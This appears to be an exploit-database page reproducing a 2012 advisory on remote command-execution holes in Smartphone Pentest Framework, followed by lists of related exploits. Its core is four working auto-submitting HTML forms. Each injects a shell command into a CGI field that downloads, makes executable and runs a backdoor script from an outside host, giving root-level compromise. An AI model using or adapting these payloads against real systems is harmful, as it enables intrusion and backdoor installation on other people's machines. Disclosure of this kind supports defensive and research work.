Menu

Search for hundreds of thousands of exploits

"Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities"

Author

Exploit author

"High-Tech Bridge"

Platform

Exploit platform

cgi

Release date

Exploit published date

2012-12-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
source: https://www.securityfocus.com/bid/56881/info

Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.

Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.

Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected. 

1.

<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl" 
method="post" name=f1>
<input type="hidden" name="platformDD2" value='android' />
<input type="hidden" name="hostingPath" value='a & wget 
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch && 
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

2. 

<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl" 
method="post" name=f1>
<input type="hidden" name="hostingPath" value='a & wget 
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && 
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

3.

<form 
action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl" 
method="post" name=f1>
<input type="hidden" name="appURLPath" value='a & wget 
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && 
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

4.

<form 
action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl" 
method="post" name=f1>
<input type="hidden" name="ipAddressTB" value='a & wget 
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && 
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection" webapps cgi "Gabriele Zuddas"
2020-10-29 "Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)" webapps cgi "Valerio Alessandroni"
2020-04-23 "Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)" webapps cgi "Dhiraj Mishra"
2020-04-10 "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" webapps cgi "Basim Alabdullah"
2020-03-30 "Zen Load Balancer 3.10.1 - Remote Code Execution" webapps cgi "Cody Sixteen"
2020-02-11 "CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting" webapps cgi Luca.Chiou
2019-09-09 "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" webapps cgi LiquidWorm
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
Release Date Title Type Platform Author
2014-08-20 "ArticleFR - 'id' SQL Injection" webapps php "High-Tech Bridge"
2014-07-23 "Ilya Birman E2 - '/@actions/comment-process' SQL Injection" webapps php "High-Tech Bridge"
2014-05-08 "TOA - Cross-Site Request Forgery" webapps php "High-Tech Bridge"
2014-03-24 "Symphony 2.2.4 - Cross-Site Request Forgery" webapps php "High-Tech Bridge"
2014-01-28 "Eventum 2.3.4 - 'hostname' Remote Code Execution" webapps php "High-Tech Bridge"
2014-01-27 "Eventum - Insecure File Permissions" webapps php "High-Tech Bridge"
2014-01-16 "Joomla! Component Sexy polling 1.0.8 - 'answer_id' SQL Injection" webapps php "High-Tech Bridge"
2013-12-11 "eduTrac - 'showmask' Directory Traversal" webapps php "High-Tech Bridge"
2013-08-21 "Twilight CMS - DeWeS Web Server Directory Traversal" webapps php "High-Tech Bridge"
2013-07-31 "Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-07-31 "Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-07-24 "Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-07-24 "WordPress Plugin Duplicator - Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-06-26 "Xaraya - Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-04-10 "Hero Framework - '/users/login?Username' Cross-Site Scripting" webapps java "High-Tech Bridge"
2013-04-10 "Hero Framework - '/users/forgot_password?error' Cross-Site Scripting" webapps java "High-Tech Bridge"
2013-04-03 "Symphony - 'sort' SQL Injection" webapps php "High-Tech Bridge"
2013-04-03 "FUDforum - Multiple Remote PHP Code Injection Vulnerabilities" webapps php "High-Tech Bridge"
2013-02-27 "Geeklog - Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-02-06 "WordPress Plugin Wysija Newsletters - Multiple SQL Injections" webapps php "High-Tech Bridge"
2013-02-06 "WordPress Plugin CommentLuv - '_ajax_nonce' Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-01-31 "Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities" remote multiple "High-Tech Bridge"
2013-01-09 "Samsung Kies - Remote Buffer Overflow" remote windows "High-Tech Bridge"
2013-01-09 "Quick.CMS / Quick.Cart - Cross-Site Scripting" webapps php "High-Tech Bridge"
2012-12-10 "Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities" webapps cgi "High-Tech Bridge"
2012-11-21 "dotProject 2.1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2012-11-21 "dotProject 2.1.x - 'index.php' Multiple SQL Injections" webapps php "High-Tech Bridge"
2012-11-07 "OrangeHRM - 'sortField' SQL Injection" webapps php "High-Tech Bridge"
2012-10-17 "jCore - '/admin/index.php?path' Cross-Site Scripting" webapps php "High-Tech Bridge"
2012-10-10 "OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting" webapps php "High-Tech Bridge"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.